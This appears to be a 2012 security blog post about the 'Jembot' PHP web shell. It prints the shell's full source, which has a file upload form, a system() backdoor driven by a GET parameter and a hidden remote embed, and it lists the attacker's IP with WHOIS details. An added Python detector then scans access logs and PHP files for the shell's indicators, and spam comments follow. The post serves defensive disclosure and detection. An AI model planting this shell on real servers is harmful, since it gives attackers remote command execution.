Tuesday, April 17, 2012

New web bot found [Jembot]

We have discovered a new kind of bot, called Jembot, that is distributed in the form of a PHP web shell.
Source code of the shell, as found:

<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 
Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell.php

Attacks originate from IP 187.17.65.242 (Brazil).

WHOIS:
inetnum: 187.17.64/18
aut-num: AS15201
abuse-c: SEO50
owner: Universo Online S.A.
ownerid: 001.109.184/0001-95
responsible: Contato da Entidade UOL
country: BR
owner-c: CAU12
tech-c: CAU12
inetrev: 187.17.64/20
nserver: ns1.host.uol.com.br
nsstat: 20120412 AA
nslastaa: 20120412
nserver: ns2.host.uol.com.br
nsstat: 20120412 AA
nslastaa: 20120412
created: 20081022
changed: 20081022

nic-hdl-br: CAU12
person: Contato Administrativo - UOL
e-mail: l-registrobr-uol@corp.uol.com.br
created: 20031202
changed: 20100106

nic-hdl-br: SEO50
person: Security Office
e-mail: security@uol.com.br
created: 20021114
changed: 20110830
We strongly recommend blocking this IP address and running the following command against your web server access logs to find requests for the shell:
# egrep -n --color "hell.php" *.log
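The following is an added example, not code from the original post: it generalizes the egrep check above into a small indicator-based scanner. It looks for the shell's file name and its two GET triggers (jembot and empix) in access-log lines, flags the source IP named in the post, and separately scans PHP file contents for strings taken from the shell source (the empixcrew banner, the system($_GET["empix"]) back door, the gaza.swf embed). It assumes the Apache/nginx "combined" log format; all log lines and file contents below are constructed samples.

```python
"""Indicator-based detection for the Jembot web shell described in the post.

Added example (not from the original post). Two checks:
  * scan web-server access-log lines for the shell's file name, its GET
    triggers (jembot / empix) and the source IP the post attributes the
    attacks to;
  * scan PHP file contents for strings lifted from the shell source.
"""
import re
from urllib.parse import urlsplit, parse_qs

KNOWN_BAD_IPS = {"187.17.65.242"}      # IP named in the post
SHELL_FILENAME = "hell.php"            # file name named in the post
TRIGGER_PARAMS = {"jembot", "empix"}   # GET parameters the shell reacts to

# Strings taken from the shell source on the page, used for on-disk scanning.
FILE_MARKERS = (
    "empixcrew",
    "$_GET['jembot']",
    'system($_GET["empix"])',
    "empixcrew.net/gaza.swf",
)

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def inspect_request(line):
    """Return the list of indicator names matching one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    parts = urlsplit(m.group("target"))
    # Path-aware match: a bare substring grep for "hell.php" would also hit "shell.php".
    if parts.path == SHELL_FILENAME or parts.path.endswith("/" + SHELL_FILENAME):
        hits.append("shell-filename")
    # keep_blank_values=True so a bare "?jembot" (no '=') is still seen as a parameter.
    params = set(parse_qs(parts.query, keep_blank_values=True))
    for p in sorted(params & TRIGGER_PARAMS):
        hits.append("trigger-param:" + p)   # catches renamed copies of the shell too
    if m.group("ip") in KNOWN_BAD_IPS:
        hits.append("known-bad-ip")
    # A POST to the shell file is its multipart upload path.
    if m.group("method") == "POST" and "shell-filename" in hits:
        hits.append("upload-attempt")
    return hits


def scan_log(lines):
    """Return (line_number, source_ip, hits) for every line with an indicator."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = inspect_request(line)
        if hits:
            findings.append((n, LOG_RE.match(line).group("ip"), hits))
    return findings


def scan_php_source(text):
    """Return the file markers present in one PHP file's contents."""
    return [mk for mk in FILE_MARKERS if mk in text]


# Constructed sample log lines (RFC 5737 documentation addresses except the post's IP).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '187.17.65.242 - - [17/Apr/2012:10:00:02 +0000] "GET /wp-content/uploads/2011/12/chase/hell.php?jembot HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '187.17.65.242 - - [17/Apr/2012:10:00:03 +0000] "POST /wp-content/uploads/2011/12/chase/hell.php?jembot HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Apr/2012:10:00:04 +0000] "GET /img/logo.php?empix=id HTTP/1.1" 200 80 "-" "curl/7.22"',
    '203.0.113.9 - - [17/Apr/2012:10:00:05 +0000] "GET /shell.php HTTP/1.1" 404 200 "-" "Mozilla/5.0"',
]

# Constructed file contents: a stripped-down copy of the shell and a benign file.
SAMPLE_SHELL = (
    "<?php\nif(isset($_GET['jembot'])) { echo 'empixcrew technology'; }\n"
    'elseif ($_GET["empix"]) { system($_GET["empix"]); }\n?>\n'
    '<embed src="http://empixcrew.net/gaza.swf" hidden="true">'
)
SAMPLE_CLEAN = "<?php\necho 'hello';\n?>\n"

if __name__ == "__main__":
    for n, ip, hits in scan_log(SAMPLE_LOG):
        print(f"log line {n} from {ip}: {', '.join(hits)}")
    print("shell markers:", scan_php_source(SAMPLE_SHELL))
    print("clean markers:", scan_php_source(SAMPLE_CLEAN))
```

Two points the sample set illustrates: the last log line (/shell.php) is not flagged, although the post's substring grep for "hell.php" would match it, and the request to /img/logo.php?empix=id is flagged even though the shell was renamed, because the parameter check does not depend on the file name. For a real deployment, feed scan_log the lines of each access log and scan_php_source the contents of every .php file under the web root, especially upload directories such as wp-content/uploads.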

7 comments:


  1. Thanks for your post!


    Furniture shipping company from Jeddah to the Emirates Furniture shipping company from Jeddah to the Emirates
    Furniture shipping company from Jeddah to Jordan Furniture shipping company from Jeddah to Jordan

  2. Among other courses, business research writing services has become popular since students seek Business Coursework Writing Services and business essay writing services.
